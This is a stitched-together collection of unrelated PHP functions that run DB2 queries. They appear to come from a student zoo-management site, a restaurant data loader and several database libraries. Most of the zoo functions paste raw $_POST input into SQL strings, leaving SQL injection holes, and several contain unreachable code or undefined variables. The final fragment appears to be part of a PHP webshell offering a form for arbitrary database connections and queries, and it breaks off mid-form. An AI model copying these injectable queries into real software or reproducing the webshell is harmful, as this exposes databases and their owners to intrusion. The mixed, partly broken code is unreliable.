function editEquipInfo() { if (isset($_POST)) { $equipid = $_POST['update_equipid']; $equipname = $_POST['edit_equipname']; $equiptype = $_POST['edit_equiptype']; $status = $_POST['edit_status']; } $conn = dbConnect(); if ($conn) { $sql = "UPDATE EMM_ZOO.SANITATION_EQUIP SET EQUIPID = '{$equipid}', EQUIPNAME = '{$equipname}' , EQUIPTYPE = '{$equiptype}', STATUS = '{$status}' WHERE EQUIPID = {$equipid};"; $result = db2_exec($conn, $sql); if ($result) { echo "<script>"; echo "alert('Updated successfully')"; echo "</script>"; header('Location: sani_equip.php#car_list'); exit; } else { $resultMessage = 0; echo "<script>"; echo "alert('Updated unsuccessfully')"; echo "</script>"; return $resultMessage; } db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg(); } }
function updateTicket() { // connect db=> stmt sql => insert => refresh page if (isset($_POST)) { $ticketshowID = $_POST['showid_value']; } $conn = dbConnect(); // start connect db if ($conn) { $insert = " INSERT INTO EMM_ZOO.TICKETSHOW_BUYING (TICKETSHOW_ID, SHOWID, ROUNDID , BUYING_DATE) VALUES (DEFAULT, '{$ticketshowID}',CURRENT TIME, CURRENT DATE);"; echo $insert; $rc = db2_exec($conn, $insert); if ($rc) { header("Refresh:0; url=ShowList.php"); } else { // If statement is error why see the code die('Critical error:' . db2_stmt_error($stmt)); } // finish all query statement db2_free_stmt($rc); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
function orderoldfood() { if (isset($_POST)) { $food_id = $_POST['food_id']; $food_name = $_POST['food_name']; $food_type = $_POST['food_type']; $add_amount = $_POST['add_amount']; $price_per = $_POST['price_per']; $total = $add_amount * $price_per; } $conn = dbConnect(); if ($conn) { $sql0 = "SELECT AMOUNT FROM EMM_ZOO.FM_STOCK WHERE FOODID = {$food_id};"; $stm = dbQuery($conn, $sql0); while ($row = dbFetchArray($conn, $stm)) { $amountx = $row[0]; } $amount_now = $amountx + $add_amount; $sql1 = "INSERT INTO EMM_ZOO.FOODANIMAL_EXPENSE (FOODEXPENSE_ID,DATES,FOODID,COST,RESPONPERSONID) VALUES (DEFAULT,CURRENT DATE,{$food_id},{$total},'5678');"; $cb = db2_exec($conn, $sql1); $sql2 = "UPDATE EMM_ZOO.FM_STOCK SET AMOUNT = {$amount_now} WHERE FOODID = {$food_id};"; $cc = db2_exec($conn, $sql2); if ($cc && $cb) { $resultMessage = 1; return $resultMessage; header('Location: FoodStock.php#food_list'); } else { $resultMessage = 0; return $resultMessage; } db2_free_stmt($stmt); db2_close($conn); } }
function updateTicket() { // connect db=> stmt sql => insert => refresh page if (isset($_POST)) { $tickettourID = $_POST['tourid_value']; } $conn = dbConnect(); // start connect db if ($conn) { $insert = " INSERT INTO EMM_ZOO.TICKETTOUR_TRANSACTION (TICKETTOUR_ID, TOUR_ID, DATE) VALUES (DEFAULT, '{$tickettourID}', CURRENT DATE);"; echo $insert; $rc = db2_exec($conn, $insert); if ($rc) { header("Refresh:0; url=TourTicket.php"); } else { // If statement is error why see the code die('Critical error:' . db2_stmt_error($stmt)); } // finish all query statement db2_free_stmt($rc); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
function editCarPlate() { if (isset($_POST)) { $carid = $_POST['update_carid']; $carplate = $_POST['edit_carplate']; } $conn = dbConnect(); if ($conn) { $sql = "UPDATE EMM_ZOO.SANICAR SET CARID = '{$carid}', CARPLATE = '{$carplate}' WHERE CARID = {$carid};"; $result = db2_exec($conn, $sql); if ($result) { echo "<script>"; echo "alert('Updated successfully')"; echo "</script>"; header('Location: sani_garbage.php#car_list'); exit; } else { $resultMessage = 0; echo "<script>"; echo "alert('Updated unsuccessfully')"; echo "</script>"; return $resultMessage; } db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg(); } }
function select() { $conn = $this->connect(); if ($conn == true) { $sql = "SELECT name from helloworld"; $result = db2_exec($conn, $sql); while ($row = db2_fetch_array($result)) { echo $text = $row[0]; } } }
function insertIntoRestaurant($conn, $cities, $name1, $street, $city, $state, $zip, $long, $lat) { if (array_key_exists($city, $cities)) { //Used to filter unwanted cities $sql = "insert into " . userAccount . ".restaurant values('" . $name1 . "', NULL, '" . $street . "', '" . $city . "', '" . $state . "', '" . $zip . "', '" . COUNTY . "', " . $long . ", " . $lat . ")"; $result = db2_exec($conn, $sql); //if(!$result) //log failure } else { //log rejected city } }
function updateTicket() { // connect db=> stmt sql => insert => refresh page if (isset($_POST['id_value'])) { $transID = $_POST['id_value']; } $conn = dbConnect(); // start connect db if ($conn) { $update = "UPDATE EMM_ZOO.TICKETTRANS_TRANSACTION SET TICKETTRANS_TIMEIN = CURRENT TIME WHERE TICKETTRANS_ID = " . $transID . ";"; //echo $update; $rc = db2_exec($conn, $update); if ($rc) { //header("Refresh:0; url=TranspotationIN.php"); } else { // If statement is error why see the code die('Critical error:' . db2_stmt_error($stmt)); } // finish all query statement db2_free_stmt($rc); $sql = "SELECT * FROM EMM_ZOO.TICKETTRANS_TRANSACTION JOIN EMM_ZOO.TICKETTRANS_TYPE ON VEHICLETRANS_ID = TRANSTYPE_ID WHERE TICKETTRANS_ID = " . $transID . ";"; $stmt = db2_exec($conn, $sql); while ($row = db2_fetch_assoc($stmt)) { $tran_price = $row['TRANSTYPE_PRICE']; $tran_type = $row['TRANSTYPE_NAME']; $hourOut = (int) substr($row['TICKETTRANS_TIMEOUT'], 0, 2); $hourIn = (int) substr($row['TICKETTRANS_TIMEIN'], 0, 2); $extraOut = (int) substr($row['TICKETTRANS_TIMEOUT'], 3, 2); $extraIn = (int) substr($row['TICKETTRANS_TIMEIN'], 3, 2); $price = ($hourIn - $hourOut) * $tran_price; // ราคาต้องดึงมาจาก trans_Type table if ($extraIn - $extraOut > 0) { $price += $tran_price; } if ($extraIn - $extraOut == 0 && $hourIn - $hourOut == 0 && (int) substr($row['TICKETTRANS_TIMEOUT'], 6, 2) != (int) substr($row['TICKETTRANS_TIMEIN'], 6, 2)) { $price += $tran_price; } if ($stmt) { // echo "Insert successfully!!"; echo "<script>alert('Price of {$tran_type} is {$price}');window.location='TranspotationIN.php';</script>"; //header("Refresh:0; url=TranspotationIN.php"); } else { // If statement is error why see the code die('Critical error:' . db2_stmt_error($stmt)); } } db2_free_stmt($rc); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
function updateTicket() { // connect db=> stmt sql => insert => refresh page if (isset($_POST)) { $type[0] = $_POST['typeC']; $type[1] = $_POST['typeA']; $type[2] = $_POST['typeF']; $num[0] = intval($_POST['TicketNumC']); $num[1] = intval($_POST['TicketNumA']); $num[2] = intval($_POST['TicketNumF']); //$num = $_POST['TicketNum']; } // start connect db $conn = dbConnect(); if ($conn) { //Part one select data from tickettype for ($i = 0; $i <= 2; $i++) { if ($num[$i] == 0) { continue; } $sql = "SELECT * FROM EMM_ZOO.TICKETGATE_TYPE WHERE TICKETGATE_TYPE = '{$type[$i]}';"; $stmt = db2_prepare($conn, $sql); $result = db2_execute($stmt); while ($row = db2_fetch_assoc($stmt)) { $ticket_price = $row['TICKETGATETYPE_PRICE']; $ticket_type = $row['TICKETGATE_TYPE']; $ticket_id = intval($row['TICKETGATETYPE_ID']); //printf ("%-5d %-16s %-32d\n", // $ticket_price, $ticket_type, $ticket_id); } $insert = "INSERT INTO EMM_ZOO.TICKETGATE_TRANSACTION (TICKETGATE_ID, TICKETGATETYPE_ID, TICKETGATE_DATE, TICKETGATE_NUM, TICKETGATE_PRICE) VALUES (DEFAULT, {$ticket_id}, CURRENT DATE, {$num[$i]}" . "," . $ticket_price * $num[$i] . ");"; //echo $insert; $rc = db2_exec($conn, $insert); // ตรงนี้ error ยังไม่เสร็จ if ($rc) { // echo "Insert successfully!!"; echo "<script>alert('{$num[$i]} {$type[$i]} ticket has sole in price " . $ticket_price * $num[$i] . "');window.location='GateTricket.php';</script>"; } else { // If statement is error why see the code die('Critical error:' . db2_stmt_error($stmt)); } // finish all query statement db2_free_stmt($stmt); } db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
function carReturn() { $up = "Y"; if (isset($_POST)) { $empID = $_POST['empID']; $carID = $_POST['carID']; // an array that want to insert this can be multiple array at the time. // print var_dump to display an array of variable data with type that prepare for query. //echo var_dump($data) ."<br>"; } // define $conn from model $conn = dbConnect(); if ($conn) { // DEFAULT if you set generated as identify with specifier this will auto increament for integer. $delete = "DELETE FROM EMM_ZOO.CARS_BORROWED WHERE EMM_ZOO.CARS_BORROWED.CARID = '" . $carID . "';"; $update = "UPDATE EMM_ZOO.CARS SET EMM_ZOO.CARS.AVAILABLE = '" . $up . "' WHERE EMM_ZOO.CARS.CARID = '" . $carID . "';"; $guanteen = "SELECT AVAILABLE FROM EMM_ZOO.CARS WHERE EMM_ZOO.CARS.CARID = '" . $carID . "';"; $ans = dbQuery($conn, $guanteen); $row = dbFetchArray($conn, $ans); if ($row[0] == 'Y' || $row[0] == 'y') { echo "<script type='text/javascript'>alert(' This car has not been borrowed yet');</script>"; header("Refresh:0; url=returnCar.php"); } else { $result = db2_exec($conn, $delete); if ($result) { $result2 = db2_exec($conn, $update); if ($result2) { echo "<script type='text/javascript'>alert('CAR RETURNED');</script>"; header("Refresh:0; url=returnCar.php"); } else { echo "<script type='text/javascript'>alert('You need to fill all input OR Your employeeID,carID does not exist');</script>"; header("Refresh:0; url=TransportationEmployee.php"); } } else { // If statement is error why see the code die('Critical error:' . db2_stmt_error($stmt)); } db2_free_stmt($result); db2_free_stmt($result2); } db2_free_stmt($ans); db2_free_stmt($row); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
function ordernewfood() { if (isset($_POST)) { $food_name = $_POST['food_name']; $food_type = $_POST['food_type']; $add_amount = $_POST['add_amount']; $price_per = $_POST['price_per']; $total = $add_amount * $price_per; $username = $_POST['username']; $data = array($food_name, $food_type, $add_amount, $price_per); } $conn = dbConnect(); if ($conn) { $conn = dbConnect(); $sql0 = "INSERT INTO EMM_ZOO.FM_STOCK (FOODID,FOODNAME,TYPE,AMOUNT,PERAMOUNT) VALUES(DEFAULT,'{$food_name}','{$food_type}',{$add_amount}, {$price_per})"; $ca = db2_exec($conn, $sql0); if ($ca) { $resultMessage = 1; return $resultMessage; } else { $resultMessage = 0; return $resultMessage; } $sql1 = "SELECT FOODID FROM EMM_ZOO.FM_STOCK WHERE FOODNAME = '{$food_name}';"; $stm = dbQuery($conn, $sql); while ($row = dbFetchArray($conn, $stm)) { $foodidx = $row[0]; } $sql2 = "INSERT INTO EMM_ZOO.FOODANIMAL_EXPENSE (FOODEXPENSE_ID,DATES,FOODID,COST,RESPONPERSONID) VALUES (DEFAULT,current date,{$foodidx},{$total},{$username});"; $sc = db2_exec($conn, $sql2); if ($sc) { $resultMessage = 1; return $resultMessage; header('Location: FoodStock.php#order_new'); exit; } else { $resultMessage = 0; return $resultMessage; } db2_free_stmt($stmt); db2_close($conn); } }
function editEmployeeInfo() { if (isset($_POST)) { $empid = $_POST['update_empid']; $jobid = $_POST['edit_jobid']; $firstname = $_POST['edit_firstname']; $lastname = $_POST['edit_lastname']; $birthdate = $_POST['edit_birthdate']; $sex = $_POST['edit_sex']; $nationality = $_POST['edit_nationality']; $hiredate = $_POST['edit_hiredate']; $address = $_POST['edit_address']; $email = $_POST['edit_email']; $phone = $_POST['edit_phone']; $salary = $_POST['edit_salary']; $bonus = $_POST['edit_bonus']; } $conn = dbConnect(); if ($conn) { $sql = "UPDATE EMM_ZOO.EMPLOYEE SET EMPID = '{$empid}', JOBID = '{$jobid}', FIRSTNAME = '{$firstname}', LASTNAME = '{$lastname}', BIRTHDATE = '{$birthdate}', SEX = '{$sex}', NATIONALITY = '{$nationality}', HIREDATE = '{$hiredate}', ADDRESS = '{$address}', EMAIL = '{$email}', PHONE = '{$phone}' , SALARY = '{$salary}', BONUS = '{$bonus}' WHERE EMPID = {$empid};"; $result = db2_exec($conn, $sql); if ($result) { echo "<script>"; echo "alert('Updated successfully')"; echo "</script>"; header('Location: sani_emp.php#emp_list'); exit; } else { $resultMessage = 0; echo "<script>"; echo "alert('Updated unsuccessfully')"; echo "</script>"; return $resultMessage; } db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg(); } }
function addRound() { if (isset($_POST)) { $showID = $_POST['showID']; $roundID = $_POST['roundID']; $starttime = $_POST['starttime']; $endtime = $_POST['endtime']; $showdate = $_POST['showdate']; } $conn = dbConnect(); if ($conn) { $insert = "INSERT INTO EMM_ZOO.SHOW_TIMETABLE(SHOWID, ROUNDID, STARTTIME, ENDTIME, DATES) values({$showID}, {$roundID}, '{$starttime}', '{$endtime}', '{$showdate}');"; //$insert = "INSERT INTO EMM_ZOO.SHOW_TIMETABLE(SHOWID, ROUNDID, STARTTIME, ENDTIME, DATES) values(1, 3, '16:00:00', '16:30:00', '11/12/2015');"; $rc = db2_exec($conn, $insert); if ($rc) { echo "Insert Successful"; } else { die('Critical error: ' . db2_stmt_error($rc)); } $sql = "SELECT * from EMM_ZOO.SHOW WHERE SHOWID = {$showID};"; $stmt = db2_prepare($conn, $sql); $result = db2_execute($stmt); while ($row = db2_fetch_assoc($stmt)) { $zone = $row['BUILDINGID']; $name = $row['SHOWNAME']; } $insert = "INSERT INTO EMM_ZOO.SHOW_TICKET(SHOWID, STARTTIME, ENDTIME, DATES, SHOWNAME, ZONEID) values({$showID}, '{$starttime}', '{$endtime}', '{$showdate}', '{$name}', {$zone});"; $rc = db2_exec($conn, $insert); if ($rc) { echo "Insert Successful"; } else { die('Critical error: ' . db2_stmt_error($rc)); } db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
function exportfood() { if (isset($_POST)) { $food_id = $_POST['food_id2']; $food_name = $_POST['food_name2']; $food_type = $_POST['food_type2']; $out_amount = $_POST['out_amount']; $username = $_SESSION['current_user_name']; } $conn = dbConnect(); if ($conn) { $sql0 = "SELECT AMOUNT FROM EMM_ZOO.FM_STOCK WHERE FOODID = {$food_id};"; $stm = dbQuery($conn, $sql0); while ($row = dbFetchArray($conn, $stm)) { $amountx = $row[0]; } $amount_now = $amountx - $out_amount; if ($amount_now > 0) { $sql1 = "UPDATE EMM_ZOO.FM_STOCK SET AMOUNT = {$amount_now} WHERE FOODID = {$food_id};"; $cz = db2_exec($conn, $sql1); $sql2 = "INSERT INTO EMM_ZOO.FOOD_GIVE(GIVENO,FOODID,EMPID,FOODNAME,FOODTYPE,AMOUNT,GIVETIME,ANIMAL) VALUES (DEFAULT,'{$food_id}','5678','{$food_name}','{$food_type}',{$out_amount},NULL,NULL);"; $cb = db2_exec($conn, $sql2); if ($cb && $cz) { $resultMessage = 1; return $resultMessage; header('Location: FoodStock.php#food_list'); } else { $resultMessage = 0; return $resultMessage; } db2_free_stmt($stmt); db2_close($conn); } else { echo "<script language='javascript'>alert('Not enough food!');</script>"; } } }
function addEmp2() { if (isset($_POST)) { $EmpID = $_POST['employeeAdd']; // an array that want to insert this can be multiple array at the time. } $conn = dbConnect(); if ($conn) { $sql = "INSERT INTO EMM_ZOO.MAINTEGERAINPERSON (MPSNO, EMPID, REQUESTID) VALUES ({$EmpID}, {$EmpID} ,0);"; //$sql2 = 'INSERT INTO EMM_ZOO.EMP_SANI (EMPID) VALUES (?);'; //echo $sql; // prepare statement using connection and sql // If statement is valid execute it to db2 //echo "SQL is valid<br>"; $result = db2_exec($conn, $sql); if ($result) { $resultMessage = "Successfully added to maintainance personel"; //echo "Successfully added"; echo "<script>"; echo "alert('Added successfully')"; echo "</script>"; header("Refresh:0; url=team.php"); exit; } else { $resultMessage = "Failed to query into database"; echo "<script>"; echo "alert('Failed to query into database')"; echo "</script>"; header("Refresh:0; url=team.php"); } db2_free_stmt($result); db2_close($conn); } else { echo db2_conn_errormsg(); } }
function addRound() { if (isset($_POST)) { $showID = $_POST['showID']; $roundID = $_POST['roundID']; $starttime = $_POST['starttime']; $endtime = $_POST['endtime']; $showdate = $_POST['showdate']; } $conn = dbConnect(); if ($conn) { //$insert = "Update"; $rc = db2_exec($conn, $insert); if ($rc) { echo "Insert Successful"; } else { die('Critical error: ' . db2_stmt_error($rc)); } db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
function updateTicket() { // connect db=> stmt sql => insert => refresh page if (isset($_POST)) { $type = $_POST['type']; } // start connect db $conn = dbConnect(); if ($conn) { //Part one select data from tickettype $sql = "SELECT * FROM EMM_ZOO.TICKETTRANS_TYPE WHERE TRANSTYPE_NAME = '{$type}';"; //echo $sql; $stmt = db2_prepare($conn, $sql); $result = db2_execute($stmt); while ($row = db2_fetch_assoc($stmt)) { $tran_price = $row['TRANSTYPE_PRICE']; $tran_type = $row['TRANSTYPE_NAME']; $tran_id = $row['TRANSTYPE_ID']; // printf ("%-5d %-16s %-32d\n", // $tran_price, $tran_type, $tran_id); } $insert = " INSERT INTO EMM_ZOO.TICKETTRANS_TRANSACTION (TICKETTRANS_ID, VEHICLETRANS_ID, TICKETTRANS_DATE , TICKETTRANS_TIMEIN ,TICKETTRANS_TIMEOUT) VALUES (DEFAULT, '{$tran_id}',CURRENT DATE , NULL, CURRENT TIME);"; $rc = db2_exec($conn, $insert); if ($rc) { echo "<script>alert('1 {$tran_type} has rent');window.location='TranspotationTricket.php';</script>"; } else { // If statement is error why see the code die('Critical error:' . db2_stmt_error($stmt)); } // finish all query statement db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
/** * Executes an unbuffered SQL query * * @param string|fStatement $statement The statement to perform * @param fUnbufferedResult $result The result object for the query * @param array $params The parameters for prepared statements * @return void */ private function performUnbufferedQuery($statement, $result, $params) { fCore::startErrorCapture(); $extra = NULL; if (is_object($statement)) { $statement->executeUnbufferedQuery($result, $params, $extra, $statement != $this->statement); } elseif ($this->extension == 'ibm_db2') { $result->setResult(db2_exec($this->connection, $statement, array('cursor' => DB2_FORWARD_ONLY))); } elseif ($this->extension == 'mssql') { $result->setResult(mssql_query($result->getSQL(), $this->connection, 20)); } elseif ($this->extension == 'mysql') { $result->setResult(mysql_unbuffered_query($result->getSQL(), $this->connection)); } elseif ($this->extension == 'mysqli') { $result->setResult(mysqli_query($this->connection, $result->getSQL(), MYSQLI_USE_RESULT)); } elseif ($this->extension == 'oci8') { $extra = oci_parse($this->connection, $result->getSQL()); if (oci_execute($extra, $this->inside_transaction ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS)) { $result->setResult($extra); } else { $result->setResult(FALSE); } } elseif ($this->extension == 'pgsql') { $result->setResult(pg_query($this->connection, $result->getSQL())); } elseif ($this->extension == 'sqlite') { $result->setResult(sqlite_unbuffered_query($this->connection, $result->getSQL(), SQLITE_ASSOC, $extra)); } elseif ($this->extension == 'sqlsrv') { $result->setResult(sqlsrv_query($this->connection, $result->getSQL())); } elseif ($this->extension == 'pdo') { $result->setResult($this->connection->query($result->getSQL())); } $this->statement = $statement; $this->handleErrors(fCore::stopErrorCapture()); $this->checkForError($result, $extra); }
<?php require_once '/var/www/html/app/model/connect.php'; $sql = "SELECT BUILDINGNAME FROM EMM_ZOO.BUILDING ORDER BY BUILDINGID;"; if ($conn) { $stmt = db2_exec($conn, $sql); if ($stmt) { while ($row = db2_fetch_assoc($stmt)) { print "<option value='" . $row['BUILDINGID'] . "'>" . $row['BUILDINGNAME'] . "</option>"; } } db2_free_stmt($stmt); } else { echo db2_conn_errormsg($conn); }
/** * Executes a SQL query. * * <b>Note:</b> Use the {@link dbi_error()} function to get error information * if the connection fails. * * @param string $sql SQL of query to execute * @param bool $fatalOnError Abort execution if there is a database error? * @param bool $showError Display error to user (including possibly the * SQL) if there is a database error? * * @return mixed The query result resource on queries (which can then be * passed to the {@link dbi_fetch_row()} function to obtain the * results), or true/false on insert or delete queries. */ function dbi_query($sql, $fatalOnError = true, $showError = true) { global $phpdbiVerbose; if (strcmp($GLOBALS["db_type"], "mysql") == 0) { $res = mysql_query($sql); if (!$res) { dbi_fatal_error("Error executing query." . $phpdbiVerbose ? dbi_error() . "\n\n<br />\n" . $sql : "" . "", $fatalOnError, $showError); } return $res; } else { if (strcmp($GLOBALS["db_type"], "mysqli") == 0) { $res = mysqli_query($GLOBALS["db_connection"], $sql); if (!$res) { dbi_fatal_error("Error executing query." . $phpdbiVerbose ? dbi_error() . "\n\n<br />\n" . $sql : "" . "", $fatalOnError, $showError); } return $res; } else { if (strcmp($GLOBALS["db_type"], "mssql") == 0) { $res = mssql_query($sql); if (!$res) { dbi_fatal_error("Error executing query." . $phpdbiVerbose ? dbi_error() . "\n\n<br />\n" . $sql : "" . "", $fatalOnError, $showError); } return $res; } else { if (strcmp($GLOBALS["db_type"], "oracle") == 0) { $GLOBALS["oracle_statement"] = OCIParse($GLOBALS["oracle_connection"], $sql); return OCIExecute($GLOBALS["oracle_statement"], OCI_COMMIT_ON_SUCCESS); } else { if (strcmp($GLOBALS["db_type"], "postgresql") == 0) { @($GLOBALS["postgresql_row[\"{$res}\"]"] = 0); $res = pg_exec($GLOBALS["postgresql_connection"], $sql); if (!$res) { dbi_fatal_error("Error executing query." . $phpdbiVerbose ? dbi_error() . "\n\n<br />\n" . $sql : "" . "", $fatalOnError, $showError); } $GLOBALS["postgresql_numrows[\"{$res}\"]"] = pg_numrows($res); return $res; } else { if (strcmp($GLOBALS["db_type"], "odbc") == 0) { return odbc_exec($GLOBALS["odbc_connection"], $sql); } else { if (strcmp($GLOBALS["db_type"], "ibm_db2") == 0) { $res = db2_exec($GLOBALS["ibm_db2_connection"], $sql); if (!$res) { dbi_fatal_error("Error executing query." . $phpdbiVerbose ? dbi_error() . "\n\n<br />\n" . $sql : "" . "", $fatalOnError, $showError); } return $res; } else { if (strcmp($GLOBALS["db_type"], "ibase") == 0) { $res = ibase_query($sql); if (!$res) { dbi_fatal_error("Error executing query." . $phpdbiVerbose ? dbi_error() . "\n\n<br />\n" . $sql : "" . "", $fatalOnError, $showError); } return $res; } else { dbi_fatal_error("dbi_query(): db_type not defined."); } } } } } } } } }
function addShow() { if (isset($_POST)) { $showName = $_POST['showName']; $animalID = $_POST['animalID']; $staffID = $_POST['staffID']; $buildingID = $_POST['buildingID']; $seat = $_POST['seat']; $price = $_POST['price']; } $conn = dbConnect(); if ($conn) { $sql = "SELECT EMPID FROM EMM_ZOO.EMPLOYEE WHERE EMPID = " . $staffID; $stmt = db2_prepare($conn, $sql); $result = db2_execute($stmt); $count = 0; while ($row = db2_fetch_assoc($stmt)) { $count++; } if ($count <= 0) { echo "Wrong Staff ID."; } else { // Query db2_free_stmt($stmt); $sql = "SELECT ANIMALID FROM EMM_ZOO.ANIMAL WHERE ANIMALID = " . $animalID; $stmt = db2_prepare($conn, $sql); $result = db2_execute($stmt); $count = 0; while ($row = db2_fetch_assoc($stmt)) { $count++; } if ($count <= 0) { echo "Wrong Animal ID."; } else { $insert = "INSERT INTO EMM_ZOO.SHOW(SHOWID, SHOWNAME, BUILDINGID, SEAT_AMOUNT, PRICE) values(DEFAULT, '{$showName}', {$buildingID}, {$seat}, {$price});"; $rc = db2_exec($conn, $insert); if ($rc) { db2_free_stmt($stmt); $sql = "SELECT SHOWID from EMM_ZOO.SHOW;"; $stmt = db2_prepare($conn, $sql); $result = db2_execute($stmt); while ($row = db2_fetch_assoc($stmt)) { $show_showID = $row['SHOWID']; } $insert = "INSERT INTO EMM_ZOO.SHOW_ANIMAL (SHOWID, ANIMALID) VALUES ({$show_showID}, {$animalID});"; $rc = db2_exec($conn, $insert); if ($rc) { echo "Insert Successful"; } else { die('Critical error: ' . db2_stmt_error($stmt)); } $insert = "INSERT INTO EMM_ZOO.SHOW_STAFF (SHOWID, EMPID) VALUES ({$show_showID}, {$staffID});"; $rc = db2_exec($conn, $insert); if ($rc) { echo "Insert Successful"; } else { die('Critical error: ' . db2_stmt_error($stmt)); } /* $insert = "INSERT INTO EMM_ZOO.SHOW_TICKET (SHOWID, SHOWNAME, BUILDINGID) VALUES ($show_showID, '$showName', $buildingID);"; $rc=db2_exec($conn, $insert); if($rc) { echo "Insert Successful"; } else { die('Critical error: '. db2_stmt_error($stmt)); }*/ } else { } } } db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg($conn); } }
<?php require_once '/var/www/html/app/model/connect.php'; if (isset($_POST)) { $shopexid = $_POST['shopexid']; $date = $_POST['date']; $shopexlist = $_POST['shopexlist']; $price = $_POST['price']; $responid = $_POST['responid']; } $conn = dbConnect(); if ($conn) { $insert = "INSERT INTO EMM_ZOO.ZOOSHOP_EXPENSE(SHOPEXPENSE_ID, DATES, SHOPEXPENSE_LIST,PRICE, RESPONPERSONID) values({$shopexid}, '{$date}', '{$shopexlist}', {$price} , {$responid});"; $rc = db2_exec($conn, $insert); if ($rc) { echo "sucessfull"; header('Location:insert.php'); } else { die('Critical error: ' . db2_stmt_error($stmt)); } db2_free_stmt($stmt); db2_close($conn); } else { echo db2_conn_errormsg($conn); }
function insertIntoRestaurant($name1, $street, $city, $state, $zip, $long, $lat, $conn, $cities) { $sql = "insert into " . userAccount . ".restaurant values('" . db2_escape_string($name1) . "', NULL, '" . db2_escape_string($street) . "', '" . db2_escape_string($city) . "', '" . db2_escape_string($state) . "', '" . db2_escape_string($zip) . "', '" . COUNTY . "', " . $long . ", " . $lat . ", db2gse.ST_Point(" . $long . ", " . $lat . ", 1))"; if (array_key_exists($city, $GLOBALS['cities'])) { //Hashmap lookup to filter unwanted cities, O(1) /* $result = db2_exec( $GLOBALS['conn'] , $sql ); if(!$result){ //log failure //$sql .= "\r\n"; saveToFile(errorFile, $sql."\r\n"); }*/ try { $result = db2_exec($GLOBALS['conn'], $sql); //saveToFile(errorFile1, $sql."\r\n"); } catch (Exception $e) { //log failure //$sql .= "\r\n"; saveToFile(errorFile1, $sql . "\r\n"); echo "Query Failed<br>"; echo "Exception: " . $e->getMessage() . "<br>"; echo db2_conn_error() . "<br>"; echo db2_conn_errormsg() . "<br>"; } } else { //log rejected city //$sql .= "\r\n"; saveToFile(errorFile2, $sql . "\r\n"); } }
function _query($sql, $inputarr = false) { global $php_errormsg; if (isset($php_errormsg)) { $php_errormsg = ''; } $this->_error = ''; if ($inputarr) { if (is_array($sql)) { $stmtid = $sql[1]; } else { $stmtid = db2_prepare($this->_connectionID, $sql); if ($stmtid == false) { $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : ''; return false; } } if (!db2_execute($stmtid, $inputarr)) { if ($this->_haserrorfunctions) { $this->_errorMsg = db2_stmt_errormsg(); $this->_errorCode = db2_stmt_error(); } return false; } } else { if (is_array($sql)) { $stmtid = $sql[1]; if (!db2_execute($stmtid)) { if ($this->_haserrorfunctions) { $this->_errorMsg = db2_stmt_errormsg(); $this->_errorCode = db2_stmt_error(); } return false; } } else { $stmtid = @db2_exec($this->_connectionID, $sql); } } $this->_lastAffectedRows = 0; if ($stmtid) { if (@db2_num_fields($stmtid) == 0) { $this->_lastAffectedRows = db2_num_rows($stmtid); $stmtid = true; } else { $this->_lastAffectedRows = 0; } if ($this->_haserrorfunctions) { $this->_errorMsg = ''; $this->_errorCode = 0; } else { $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : ''; } } else { if ($this->_haserrorfunctions) { $this->_errorMsg = db2_stmt_errormsg(); $this->_errorCode = db2_stmt_error(); } else { $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : ''; } } return $stmtid; }
<?php require_once '/var/www/html/app/model/connect.php'; if (isset($_POST)) { $guardID = isset($_POST['guardId']) ? $_POST['guardId'] : null; $empID = isset($_POST['empId']) ? $_POST['empId'] : null; } $conn = dbConnect(); if ($conn) { $sql = "INSERT INTO EMM_ZOO.GUARD (GUARDID, EMPID) VALUES ('" . $empID . "', '" . $guardID . "');"; $rc = db2_exec($conn, $sql); if ($rc) { echo "<script>"; echo "alert('Successfully')"; echo "</script>"; header("Refresh:0; url=guard.php"); } else { echo "<script>"; echo "alert('Failed')"; echo "</script>"; header("Refresh:0; url=guard.php"); } } else { echo db2_conn_errormsg($conn); } db2_free_stmt($rc); db2_close($conn);
/** * This function processes an SQL statement that will NOT return data. * * @access public * @override * @param string $sql the SQL statement * @throws Throwable_SQL_Exception indicates that the executed * statement failed * * @see * @see */ public function execute($sql) { if (!$this->is_connected()) { throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: Unable to find connection.'); } $command = @db2_exec($this->resource, $sql); if ($command === FALSE) { throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: :reason', array(':reason' => @db2_stmt_errormsg($command))); } $this->sql = $sql; @db2_free_result($command); }
protected function _rawQuery($sql) { $conn = $this->_db->getConnection(); $result = @db2_exec($conn, $sql); if (!$result) { $e = db2_stmt_errormsg(); throw new Db\Exception("SQL error for \"{$sql}\": {$e}"); } }
function otherdb() { $db = isset($_GET['db']) ? $_GET['db'] : 'ms'; print <<<END <form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data"> <div class="actall"> <a href="?s=gg&db=ms">   MSSQL  </a> <a href="?s=gg&db=ora">   Oracle  </a> <a href="?s=gg&db=ifx">   InforMix  </a> <a href="?s=gg&db=fb">   FireBird  </a> <a href="?s=gg&db=db2">  DB2  </a></div></form> END; if ($db == "ms") { $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******'; $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : ''; $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; $msaction = isset($_POST['action']) ? $_POST['action'] : ''; $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; $msquery = stripslashes($msquery); print <<<END <div class="actall"> <form method="POST" name="msform" action="?s=gg&db=ms"> Host:<input type="text" name="mshost" value="{$mshost}" 